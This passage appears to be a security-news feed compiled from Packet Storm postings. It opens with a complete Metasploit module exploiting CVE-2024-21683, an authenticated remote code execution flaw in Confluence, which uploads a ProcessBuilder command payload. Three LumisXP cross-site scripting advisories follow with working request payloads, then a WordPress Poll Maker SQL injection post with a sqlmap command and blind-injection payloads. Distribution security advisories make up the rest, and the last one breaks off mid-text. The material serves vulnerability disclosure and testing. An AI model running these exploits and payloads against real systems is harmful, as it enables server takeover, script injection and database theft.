This Metasploit module exploits an authenticated administrator-level vulnerability in Atlassian Confluence, tracked as CVE-2024-21683. The vulnerability exists due to the Rhino script engine parser evaluating tainted data from uploaded text files. This facilitates arbitrary code execution. This exploit will authenticate, validate user privileges, extract the underlying host OS information, then trigger remote code execution. All versions of Confluence prior to 7.17 are affected, as are many versions up to 8.9.0.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  prepend Msf::Exploit::Remote::AutoCheck  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::Remote::HTTP::Atlassian::Confluence::Version  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Atlassian Confluence Administrator Code Macro Remote Code Execution',        'Description' => %q{          This module exploits an authenticated administrator-level vulnerability in Atlassian Confluence,          tracked as CVE-2024-21683. The vulnerability exists due to the Rhino script engine parser evaluating          tainted data from uploaded text files. This facilitates arbitrary code execution. This exploit will          authenticate, validate user privileges, extract the underlying host OS information, then trigger          remote code execution. All versions of Confluence prior to 7.17 are affected, as are many versions          up to 8.9.0.        },        'License' => MSF_LICENSE,        'Author' => [          'Ankita Sawlani', # Discovery          'Huong Kieu', # Public Analysis          'W01fh4cker', # PoC Exploit          'remmons-r7'  # MSF Exploit        ],        'References' => [          ['CVE', '2024-21683'],          ['URL', 'https://jira.atlassian.com/browse/CONFSERVER-95832'],          ['URL', 'https://realalphaman.substack.com/p/quick-note-about-cve-2024-21683-authenticated'],          ['URL', 'https://github.com/W01fh4cker/CVE-2024-21683-RCE']        ],        'DisclosureDate' => '2024-05-21',        'Privileged' => false, # `NT AUTHORITY\NETWORK SERVICE` on Windows by default, `confluence` on Linux by default.        'Platform' => ['unix', 'linux', 'win'],        'Arch' => [ARCH_CMD],        'DefaultTarget' => 0,        'Targets' => [ [ 'Default', {} ] ],        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          # The access log files will contain requests to the exploitable administrator dashboard endpoints.          'SideEffects' => [IOC_IN_LOGS]        }      )    )    register_options(      [        # By default, Confluence serves an HTTP service on TCP port 8090.        Opt::RPORT(8090),        OptString.new('TARGETURI', [true, 'The URI path to Confluence', '/']),        OptString.new('ADMIN_USER', [true, 'The Confluence administrator username', '']),        OptString.new('ADMIN_PASS', [true, 'The Confluence administrator password', ''])      ]    )  end  def check    # Begin by retrieving the version string from the login page.    version = get_confluence_version    return CheckCode::Unknown('Failed to determine the Confluence version') unless version    # Check the extracted version against all documented vulnerable versions.    if version == Rex::Version.new('8.9.0') ||       version.between?(Rex::Version.new('8.8.0'), Rex::Version.new('8.8.1')) ||       version.between?(Rex::Version.new('8.7.0'), Rex::Version.new('8.7.2')) ||       version.between?(Rex::Version.new('8.6.0'), Rex::Version.new('8.6.2')) ||       version.between?(Rex::Version.new('8.5.0'), Rex::Version.new('8.5.8')) ||       version.between?(Rex::Version.new('8.4.0'), Rex::Version.new('8.4.5')) ||       version.between?(Rex::Version.new('8.3.0'), Rex::Version.new('8.3.4')) ||       version.between?(Rex::Version.new('8.2.0'), Rex::Version.new('8.2.3')) ||       version.between?(Rex::Version.new('8.1.0'), Rex::Version.new('8.1.4')) ||       version.between?(Rex::Version.new('8.0.0'), Rex::Version.new('8.0.4')) ||       version.between?(Rex::Version.new('7.20.0'), Rex::Version.new('7.20.3')) ||       version.between?(Rex::Version.new('7.19.0'), Rex::Version.new('7.19.21')) ||       version.between?(Rex::Version.new('7.18.0'), Rex::Version.new('7.18.3')) ||       version.between?(Rex::Version.new('7.17.0'), Rex::Version.new('7.17.5')) ||       # According to Atlassian, all versions < 7.17 are vulnerable.       version.between?(Rex::Version.new('0.0.0'), Rex::Version.new('7.16.999'))      Exploit::CheckCode::Appears("Exploitable version of Confluence: #{version}")    else      Exploit::CheckCode::Safe("Non-exploitable version of Confluence: #{version}")    end  end  def login(username, password)    # Perform a POST request to login to Confluence with the provided credentials.    send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'dologin.action'),      'keep_cookies' => 'true',      'vars_post' => {        'os_username' => username,        'os_password' => password,        'os_destination' => '%2FXsuccessX'      }    )  end  def elevate    # Elevates the current administrator session. By default, administrator sessions will remain elevated for two minutes after this takes place.    vprint_status('Secure Administrator Sessions enabled - elevating session')    # Grab a CSRF token from the elevation page form.    csrf_elevation = get_csrf('doauthenticate.action', 'elevation')    # With the valid elevation token, escalate the current administrator session.    res_elevate = send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'doauthenticate.action'),      'keep_cookies' => 'true',      'vars_post' => {        'atl_token' => csrf_elevation,        'password' => datastore['ADMIN_PASS'],        'authenticate' => 'Confirm',        'destination' => '%2FXsuccessX'      }    )    # Connection failure, no response, or malformed response.    fail_with(Failure::Unknown, 'Target did not respond as expected during privilege elevation') unless res_elevate    # Confirm that the response indicates a successful elevation.    fail_with(Failure::UnexpectedReply, 'The session elevation appears to have failed') unless res_elevate.code == 302 && res_elevate.headers['Location'].include?('XsuccessX')    vprint_status('Administrator session has been elevated')  end  def get_csrf(page, operation)    # Perform a GET request to the target page to grab a CSRF token.    res_get_csrf = send_request_cgi(      'method' => 'GET',      'keep_cookies' => 'true',      'uri' => normalize_uri(target_uri.path, page)    )    # Connection failure, no response, or malformed response.    fail_with(Failure::Unknown, "Target did not respond as expected when fetching #{operation} CSRF token") unless res_get_csrf    # If the response is not 200 and does not contain the string "atl_token", the target page has behaved unexpectedly.    fail_with(Failure::UnexpectedReply, "Target returned a response that did not contain #{operation} CSRF token") unless res_get_csrf.code == 200 && res_get_csrf.body.include?('atl_token')    # Response page should contain '<input type="hidden" name="atl_token" value="tokenhere">'.    csrf_token = res_get_csrf.get_xml_document.xpath('//input[@name="atl_token"]').first&.values&.[](2)    # Token should be 40 characters.    fail_with(Failure::UnexpectedReply, "Target did not return the expected 40-character #{operation} CSRF token") unless csrf_token&.length == 40    vprint_status("Grabbed #{operation} CSRF token: #{csrf_token}")    csrf_token  end  def get_host_os    # Elevated Confluence administrators can view system information, which will be used to confirm the target OS.    res_sysinfo = send_request_cgi(      'method' => 'GET',      'keep_cookies' => 'true',      'uri' => normalize_uri(target_uri.path, 'admin', 'systeminfo.action')    )    # Connection failure, no response, or malformed response.    fail_with(Failure::Unknown, 'Target did not respond as expected while getting host OS') unless res_sysinfo    # Confirm that the response is the expected system info page.    fail_with(Failure::UnexpectedReply, 'The system information page failed to return the expected data') unless res_sysinfo.code == 200 && res_sysinfo.body.include?('operating.system')    # Extract the OS string from the response DOM.    os = res_sysinfo.get_xml_document.xpath('//span[@id="operating.system"]').first&.text    vprint_status("Target returned the operating system string '#{os}'")    # If the string begins with "win", assume the host is Windows. If it's anything else, assume it's something Unix-based.    os.downcase.start_with?('win') ? 'win' : 'nix'  end  def upload_payload(shell)    # Grab a valid macro dashboard CSRF token.    csrf_macro = get_csrf('/admin/plugins/newcode/configure.action', 'macro')    # Initialize a multipart form.    payload_form = Rex::MIME::Message.new    # ProcessBuilder string - this will inject the sh/cmd.exe sequence as the first two args and decode the base64 msf fetch payload as the third.    payload_string = "new java.lang.ProcessBuilder(#{shell}, new java.lang.String(java.util.Base64.getDecoder().decode('#{Rex::Text.encode_base64(payload.encoded)}'))).start()"    # Add the CSRF token, payload file, and 'newLanguageName' value. Both the 'languageFile' name and the 'newLanguageName' value can be any string.    payload_form.add_part(csrf_macro, 'text/plain', 'binary', 'form-data; name="atl_token"')    payload_form.add_part(payload_string, 'text/plain', 'binary', "form-data; name=\"languageFile\"; filename=\"#{rand_text_hex(10)}\"")    payload_form.add_part(rand_text_hex(10), 'text/plain', 'binary', 'form-data; name="newLanguageName"')    vprint_status("Crafted ProcessBuilder payload string: #{payload_string}")    vprint_status('Sending POST request to trigger code execution')    # POST the multipart form for code execution. A neutral error will be returned in the web response, which we can ignore.    res_upload = send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'admin', 'plugins', 'newcode', 'addlanguage.action'),      'keep_cookies' => 'true',      'ctype' => "multipart/form-data; boundary=#{payload_form.bound}",      'data' => payload_form.to_s    )    # Connection failure, no response, or malformed response.    print_error('Target did not respond as expected during code execution attempt') unless res_upload    # If the response to the multipart request does not return a 200.    print_error('The application returned a non-200 response during code execution attempt') unless res_upload.code == 200  end  def exploit    # Authenticate to Confluence.    res_login = login(datastore['ADMIN_USER'], datastore['ADMIN_PASS'])    # Connection failure, no response, or malformed response.    fail_with(Failure::Unknown, 'Target did not respond as expected during authentication') unless res_login    # If authentication does not result in a redirect with the provided "XsuccessX" 'Location' header value.    fail_with(Failure::BadConfig, 'The target did not accept the provided credentials') unless res_login.code == 302 && res_login.headers['Location'].include?('XsuccessX')    vprint_status('Successfully authenticated to Confluence')    # Attempt to fetch a privileged page with the provided valid credentials to confirm the user is an administrator.    res_check_admin = send_request_cgi(      'method' => 'GET',      'keep_cookies' => 'true',      'uri' => normalize_uri(target_uri.path, 'admin', 'console.action')    )    # Connection failure, no response, or malformed response.    fail_with(Failure::Unknown, 'Target did not respond as expected during privilege check') unless res_check_admin    # If a 'Location' header is returned in the response, the current session doesn't have full privileges.    if res_check_admin.headers['Location']      # Confluence will redirect to the login page if the current user does not have admin privileges, so check for that here.      if res_check_admin.headers['Location'].include?('login.action')        fail_with(Failure::BadConfig, 'The provided credentials are valid, but the user does not have administrative privileges')      end      vprint_status('The provided user is an administrator')      # Check whether Secure Administrator Sessions feature (sudo-like elevation prompt) is enabled. This feature is default on newer versions.      if res_check_admin.headers['Location'].include?('authenticate.action')        elevate      end    # User is an administrator and Secure Administrator Sessions is disabled.    else      vprint_status('The provided user is an administrator')    end    # As an administrator, check the host OS for selection between sh/cmd.exe in payload    shell = get_host_os == 'win' ? '"cmd.exe", "/c"' : '"/bin/sh", "-c"'    # Upload a text file containing a payload to be evaluated by the script engine    upload_payload(shell)  endend

Atlassian Confluence Administrator Code Macro Remote Code Execution

LumisXP versions 15.0.x through 16.1.x suffer from a cross site scripting vulnerability in XsltResultControllerHtml.jsp.

=====[ Tempest Security Intelligence - ADV-6/2024  
]==========================

LumisXP v15.0.x to v16.1.x

Author: Rodolfo Tavares

Tempest Security Intelligence - Recife, Pernambuco - Brazil

=====[ Table of Contents]==================================================  
 * Overview  
 * Detailed description  
 * Timeline of disclosure  
 * Thanks & Acknowledgements  
 * References

=====[ Vulnerability  
Information]=============================================  
 * Class: Improper Neutralization of Input During Web Page Generation  
('Cross-site Scripting')  
 ('Improper Neutralization of Input During Web Page Generation ('Cross-site  
Scripting')') [CWE-79]

 * CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N - 5.4

=====[ Overview]========================================================  
 * System affected : LumisXP  
 * Software Version : Version - v15.0.x to v16.1.x  
 * Impacts :  
 * Vulnerability: A cross-site scripting (XSS) vulnerability in the  
component XsltResultControllerHtml.jsp of Lumisxp v15.0.x to v16.1.x allows  
attackers to execute arbitrary web scripts or HTML via a crafted payload  
injected into the lumPageID parameter

=====[ Detailed  
description]=================================================  
* XSS [GET  
/portal/XsltResultControllerHtml.jsp?xslContent=&interfaceInstanceId=&lumPageId=%3cscript%3econfirm(1)%3c%2fscript%3e&xslContentFilePath=]:

1 - Send the link by inserting the XSS payload into the lumPageID=  
parameter.

```  
GET  
/portal/XsltResultControllerHtml.jsp?xslContent=&interfaceInstanceId=&lumPageId=%3cscript%3econfirm(1)%3c%2fscript%3e&xslContentFilePath=  
```  
2 - Verify that in the response your payload will be executed.

=====[ Timeline of  
disclosure]===============================================

 2/Apr/2024 - Responsible disclosure was initiated with the vendor.  
 12/Apr/2024 - LumisXP Support confirmed the issue;  
 16/Fev/2024 - The vendor fixed the vulnerability  
 29/May/2024 - CVEs was assigned and reserved as CVE-2024-33326

=====[ Thanks & Acknowledgements]========================================  
 * Tempest Security Intelligence [1]  
 * Rodolfo Tavares  
 * Niklas Correa

=====[ References ]=====================================================

 [1][ [https://cwe.mitre.org/data/definitions/79.html]  
 [2][ [https://www.tempest.com.br|https://www.tempest.com.br/]]  
 [3][Thanks Filipe X.]

=====[ EOF ]===========================================================  
--

-- 

*Esta mensagem é para uso exclusivo de seu destinatário e pode conter   
informações privilegiadas e confidenciais. Todas as informações aqui   
contidas devem ser tratadas como confidenciais e não devem ser divulgadas a   
terceiros sem o prévio consentimento por escrito da Tempest. Se você não é   
o destinatário não deve distribuir, copiar ou arquivar a mensagem. Neste   
caso, por favor, notifique o remetente da mesma e destrua imediatamente a   
mensagem.*

*  
*  
*This message is intended solely for the use of its   
addressee and may contain privileged or confidential information. All   
information contained herein shall be treated as confidential and shall not   
be disclosed to any third party without Tempest’s prior written approval.   
If you are not the addressee you should not distribute, copy or file this   
message. In this case, please notify the sender and destroy its contents   
immediately.**  
*  
*  
*

LumisXP 16.1.x Cross Site Scripting

LumisXP versions 15.0.x through 16.1.x suffer from a cross site scripting vulnerability in UrlAccessibilityEvaluation.jsp.

=====[ Tempest Security Intelligence - ADV-6/2024  
]==========================

LumisXP v15.0.x to v16.1.x

Author: Rodolfo Tavares

Tempest Security Intelligence - Recife, Pernambuco - Brazil

=====[ Table of Contents]==================================================  
 * Overview  
 * Detailed description  
 * Timeline of disclosure  
 * Thanks & Acknowledgements  
 * References

=====[ Vulnerability  
Information]=============================================  
 * Class: Improper Neutralization of Input During Web Page Generation  
('Cross-site Scripting')  
 ('Improper Neutralization of Input During Web Page Generation ('Cross-site  
Scripting')') [CWE-79]

 * CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N - 5.4

=====[ Overview]========================================================  
 * System affected : LumisXP  
 * Software Version : Version - v15.0.x to v16.1.x  
 * Impacts :  
 * Vulnerability: Lumisxp versions 15.0.x to 16.1.x have an unauthenticated  
XSS vulnerability in the UrlAccessibilityEvaluation.jsp page, specifically  
in the contentHtml parameter.

=====[ Detailed  
description]=================================================  
* XSS [GET  
/main.jsp?lumChannelId=00000000F00000000000000000000002&lumPageId=LumisBlankPage&lumRTI=lumis.service.doui.selectstructureelement.selectPage&pageId=%22%2c%20print()%2c%0d%22aaa  
]:

1 - Send the link by inserting the XSS payload into the contentHtml=  
parameter.

```  
GET  
/lumis/service/htmlevaluation/UrlAccessibilityEvaluation.jsp?contentHtml=%3cp%3e%3ci%20id%3d%22run-code-button%22%20lang%3d%22xml%22%20title%3d%22Run%20Code%20and%20See%20Output%22%3e%3c%2fi%3e%3c%2fp%3e%0a%0a%3cp%3e%3ci%20title%3d%22Light%20Mode%22%3e%3c%2fi%3e%3c%2fp%3e%0a%0a%3ctable%20border%3d%220%22%20cellpadding%3d%220%22%20cellspacing%3d%220mmdfn%26lt%3bscript%26gt%3balert(1)%26lt%3b%2fscript%26gt

```  
2 - Verify that in the response your payload will be executed.

=====[ Timeline of  
disclosure]===============================================

 2/Apr/2024 - Responsible disclosure was initiated with the vendor.  
 12/Apr/2024 - LumisXP Support confirmed the issue;  
 16/Fev/2024 - The vendor fixed the vulnerability  
 29/May/2024 - CVEs was assigned and reserved as CVE-2024-33327

=====[ Thanks & Acknowledgements]========================================  
 * Tempest Security Intelligence [1]  
 * Rodolfo Tavares  
 * Niklas Correa

=====[ References ]=====================================================

 [1][ [https://cwe.mitre.org/data/definitions/79.html]  
 [2][ [https://www.tempest.com.br|https://www.tempest.com.br/]]  
 [3][Thanks Filipe X.]

=====[ EOF ]===========================================================

--

-- 

*Esta mensagem é para uso exclusivo de seu destinatário e pode conter   
informações privilegiadas e confidenciais. Todas as informações aqui   
contidas devem ser tratadas como confidenciais e não devem ser divulgadas a   
terceiros sem o prévio consentimento por escrito da Tempest. Se você não é   
o destinatário não deve distribuir, copiar ou arquivar a mensagem. Neste   
caso, por favor, notifique o remetente da mesma e destrua imediatamente a   
mensagem.*

*  
*  
*This message is intended solely for the use of its   
addressee and may contain privileged or confidential information. All   
information contained herein shall be treated as confidential and shall not   
be disclosed to any third party without Tempest’s prior written approval.   
If you are not the addressee you should not distribute, copy or file this   
message. In this case, please notify the sender and destroy its contents   
immediately.**  
*  
*  
*

LumisXP versions 15.0.x through 16.1.x suffer from a cross site scripting vulnerability in main.jsp

=====[ Tempest Security Intelligence - ADV-6/2024  
]==========================

LumisXP v15.0.x to v16.1.x

Author: Rodolfo Tavares

Tempest Security Intelligence - Recife, Pernambuco - Brazil

=====[ Table of Contents]==================================================  
 * Overview  
 * Detailed description  
 * Timeline of disclosure  
 * Thanks & Acknowledgements  
 * References

=====[ Vulnerability  
Information]=============================================  
 * Class: Improper Neutralization of Input During Web Page Generation  
('Cross-site Scripting')  
 ('Improper Neutralization of Input During Web Page Generation ('Cross-site  
Scripting')') [CWE-79]

 * CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N - 5.4

=====[ Overview]========================================================  
 * System affected : LumisXP  
 * Software Version : Version - v15.0.x to v16.1.x  
 * Impacts :  
 * Vulnerability: A cross-site scripting (XSS) vulnerability in the  
component main.jsp of Lumisxp v15.0.x to v16.1.x allows attackers to  
execute arbitrary web scripts or HTML via a crafted payload injected into  
the pageId parameter.

=====[ Detailed  
description]=================================================  
* XSS [GET  
/main.jsp?lumChannelId=00000000F00000000000000000000002&lumPageId=LumisBlankPage&lumRTI=lumis.service.doui.selectstructureelement.selectPage&pageId=%22%2c%20print()%2c%0d%22aaa  
]:

1 - Send the link by inserting the XSS payload into the pageId= parameter.

```  
GET  
/main.jsp?lumChannelId=00000000F00000000000000000000002&lumPageId=LumisBlankPage&lumRTI=lumis.service.doui.selectstructureelement.selectPage&pageId=%22%2c%20print()%2c%0d%22aaa  
```  
2 - Verify that in the response your payload will be executed.

=====[ Timeline of  
disclosure]===============================================

 2/Apr/2024 - Responsible disclosure was initiated with the vendor.  
 12/Apr/2024 - LumisXP Support confirmed the issue;  
 16/Fev/2024 - The vendor fixed the vulnerability  
 29/May/2024 - CVEs was assigned and reserved as CVE-2024-33328

=====[ Thanks & Acknowledgements]========================================  
 * Tempest Security Intelligence [1]  
 * Rodolfo Tavares  
 * Niklas Correa

=====[ References ]=====================================================

 [1][ [https://cwe.mitre.org/data/definitions/79.html]  
 [2][ [https://www.tempest.com.br|https://www.tempest.com.br/]]  
 [3][Thanks Filipe X.]

=====[ EOF ]===========================================================

--

-- 

*Esta mensagem é para uso exclusivo de seu destinatário e pode conter   
informações privilegiadas e confidenciais. Todas as informações aqui   
contidas devem ser tratadas como confidenciais e não devem ser divulgadas a   
terceiros sem o prévio consentimento por escrito da Tempest. Se você não é   
o destinatário não deve distribuir, copiar ou arquivar a mensagem. Neste   
caso, por favor, notifique o remetente da mesma e destrua imediatamente a   
mensagem.*

*  
*  
*This message is intended solely for the use of its   
addressee and may contain privileged or confidential information. All   
information contained herein shall be treated as confidential and shall not   
be disclosed to any third party without Tempest’s prior written approval.   
If you are not the addressee you should not distribute, copy or file this   
message. In this case, please notify the sender and destroy its contents   
immediately.**  
*  
*  
*

Debian Linux Security Advisory 5727-1 - Multiple security issues have been found in the Mozilla Firefox web browser, which could potentially result in the execution of arbitrary code or privilege escalation.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5727-1                   security@debian.org  
https://www.debian.org/security/                     Salvatore Bonaccorso  
July 10, 2024                         https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : firefox-esr  
CVE ID         : CVE-2024-6601 CVE-2024-6602 CVE-2024-6603 CVE-2024-6604

Multiple security issues have been found in the Mozilla Firefox web  
browser, which could potentially result in the execution of arbitrary  
code or privilege escalation.

For the oldstable distribution (bullseye), these problems have been fixed  
in version 115.13.0esr-1~deb11u1.

For the stable distribution (bookworm), these problems have been fixed in  
version 115.13.0esr-1~deb12u1.

We recommend that you upgrade your firefox-esr packages.

For the detailed security status of firefox-esr please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/firefox-esr

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmaO6L9fFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2  
NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND  
z0RmFQ//eJd5G/2MtEuGtP7pbAh3hYThPjm2UNegQbHEddABS8xeNJYqG9znHTUk  
63GIoZ9VeTYax9/dOe4qfw+S8TRtN1PUcyO4574rk0Xg2Qy5H8Ty+TE3W8jfEFpu  
CCOSTsug4ZypU7p4+aI5gvQUb0AFQyoAwt/tepaofbZXXXf2kGPXnY22pbyiwhhg  
lxqgbKgWCNI9j6OGMNAXoqSDnIpLYfSeTrJ8OW+D/m40krtbOw0iXxW7wgZrDGJh  
zigF/Tq9Pjzpl/pHnmc+jQT5ISMFoNcR6+CVyAucXVca5w7D8B1i2M4WmTe4jft8  
ILTRKp7IIkHTyrfBDxORS2TpA0fXB5UloxyX3xuaX/scdFQooOXh/Pw612jEHAeW  
ehzmRuYYYFM3Sx6GKqVtUfz+oVF+jMzCZzkFeKJu+uox4tIOwiL1lIO8AcRmu+Kg  
u3o5JDk0OGl/I9oyocgqyXKDY8PCdwNIO7aNprbamg23MaK7URDVFkpQ5HwbikNF  
uoSHHYOxgTMaquH3SmIiOuZjEOeJlD+agMZn1zcQWtolOYNXnC3gDztQrzhAFXSs  
xMcXeoUnOev0VdVbPTsdCMZX4Vaq3A26Y1AOuYOPaJpKQd9NLxY2MZimh+BDIAwL  
Ic9ykGTn8OaFrAXODkLIHtylWtTTCh3LgtCca/dpUP3zJYFTjAM=  
=Lx/v  
-----END PGP SIGNATURE-----

Debian Security Advisory 5727-1

WordPress Poll Maker plugin version 5.3.2 suffers from a remote SQL injection vulnerability.

    # Exploit Title: WordPress Poll Maker Plugin SQL Injection # Date: 2024-07-11# Exploit Author: tmrswrr# Category : Webapps# Vendor: https://ays-pro.com/wordpress/poll-maker# Version 5.3.21. **Access the Admin Panel:**   - Navigate to the admin panel of your WordPress site.   - Go to `Poll Maker  > `Results` > https://localhost/wordpress/wp-admin/admin.php?page=poll-maker-ays-results&orderby=id&order=desc     ```3. Search for orderby parameter.## SQLMAP COMMANDpython3 sqlmap.py -u "https://localhost/wordpress/wp-admin/admin.php?page=poll-maker-ays-results&orderby=id&order=desc" --cookie="wordpress_logged_in_55e28812cb0bc43705127d62a25df794=admin|1720624086|cQgkhpgoy0ZxhQSupSHRw7bo9mxcwEWyUp0VreNnZBK|d74e12a1cdecafc50c920c18d4711826598780dd360f3a637abcc68a6086f7a3; _wp_travel_engine_session=010869411d3c5e302ccf674d9a49d453||1720689253||1720688893; wordpress_logged_in_d31d6d9d0bfd834c03c5a471886561f0=admin|1720860313|TGYBq5U4ro5vSY5QpssgjpPJi4EmsOJQqWjLKD77XaV|81237d448295de9d99b8560e6b6d9d8640f81c4dbb629e550e56860775baf0b3; wordpress_sec_d31d6d9d0bfd834c03c5a471886561f0=admin|1720860313|TGYBq5U4ro5vSY5QpssgjpPJi4EmsOJQqWjLKD77XaV|d8d2e1da10a83ab054e39b8dfa5787c0dc2d586f364bcb584983b26efb857285; wordpress_test_cookie=WP Cookie check; wp-settings-1=editor=html; wp-settings-time-1=1720687513" --batch --dbms=mysql --threads=10 --no-cast --random-agent -v 3 --tamper="between,randomcase,space2comment" --level=5 --risk=3 ## RESULTParameter: orderby (GET)    Type: time-based blind    Title: MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE)    Payload: page=poll-maker-ays-results&orderby=id PROCEDURE ANALYSE(EXTRACTVALUE(3054,CONCAT(0x5c,(BENCHMARK(5000000,MD5(0x58655778))))),1)# wcUc&order=desc    Vector: PROCEDURE ANALYSE(EXTRACTVALUE([RANDNUM],CONCAT('\',(IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])))),1)------[08:03:59] [WARNING] changes made by tampering scripts are not included in shown payload content(s)[08:03:59] [INFO] the back-end DBMS is MySQL[08:03:59] [PAYLOAD] id/**/PrOCEdUrE/**/analySE(exTRActvALuE(6707,CoNcAT(0x5c,(iF((VeRSION()/**/LikE/**/0x254d61726961444225),BenChmaRk(5000000,MD5(0x6e454541)),6707)))),1)#/**/ZrRh[08:03:59] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y[08:04:01] [DEBUG] used the default behavior, running in batch modeweb application technology: Apache 2.4.54, PHP 8.0.23back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)

WordPress Poll Maker 5.3.2 SQL Injection

Ubuntu Security Notice 6868-2 - Sander Wiebing, Alvise de Faveri Tron, Herbert Bos, and Cristiano Giuffrida discovered that the Linux kernel mitigations for the initial Branch History Injection vulnerability were insufficient for Intel processors. A local attacker could potentially use this to expose sensitive information. Several security issues were discovered in the Linux kernel. An attacker could possibly use these to compromise the system.

    ==========================================================================Ubuntu Security Notice USN-6868-2July 10, 2024linux-aws-5.4 vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 18.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux-aws-5.4: Linux kernel for Amazon Web Services (AWS) systemsDetails:Sander Wiebing, Alvise de Faveri Tron, Herbert Bos, and Cristiano Giuffridadiscovered that the Linux kernel mitigations for the initial Branch HistoryInjection vulnerability (CVE-2022-0001) were insufficient for Intelprocessors. A local attacker could potentially use this to expose sensitiveinformation. (CVE-2024-2201)Several security issues were discovered in the Linux kernel.An attacker could possibly use these to compromise the system.This update corrects flaws in the following subsystems:   - Netfilter;(CVE-2024-26925, CVE-2024-26643)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 18.04 LTS   linux-image-5.4.0-1127-aws      5.4.0-1127.137~18.04.2                                   Available with Ubuntu Pro   linux-image-aws                 5.4.0.1127.137~18.04.1                                   Available with Ubuntu ProAfter a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:   https://ubuntu.com/security/notices/USN-6868-2   https://ubuntu.com/security/notices/USN-6868-1   CVE-2024-2201, CVE-2024-26643, CVE-2024-26925

Ubuntu Security Notice USN-6868-2

Red Hat Security Advisory 2024-4504-03 - An update for httpd is now available for Red Hat Enterprise Linux 9.2 Extended Update Support. Issues addressed include a HTTP response splitting vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_4504.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: httpd security updateAdvisory ID:        RHSA-2024:4504-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:4504Issue date:         2024-07-11Revision:           03CVE Names:          CVE-2023-27522====================================================================Summary: An update for httpd is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The httpd packages provide the Apache HTTP Server, a powerful, efficient, and extensible web server.Security Fix(es):* httpd: mod_proxy_uwsgi HTTP response splitting (CVE-2023-27522)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-27522References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2176211

Red Hat Security Advisory 2024-4504-03

Red Hat Security Advisory 2024-4460-03 - An update for Red Hat Data Grid 8 is now available. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link in the References section.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_4460.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: Red Hat Data Grid 8.5.0 security updateAdvisory ID:        RHSA-2024:4460-03Product:            Red Hat JBoss Data GridAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:4460Issue date:         2024-07-10Revision:           03CVE Names:          CVE-2024-29025====================================================================Summary: An update for Red Hat Data Grid 8 is now available. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Red Hat Data Grid is an in-memory, distributed, NoSQL datastore solution. It increases application response times and allows for dramatically improving performance while providing availability, reliability, and elastic scale. Data Grid 8.5.0 replaces Data Grid 8.4.8 and 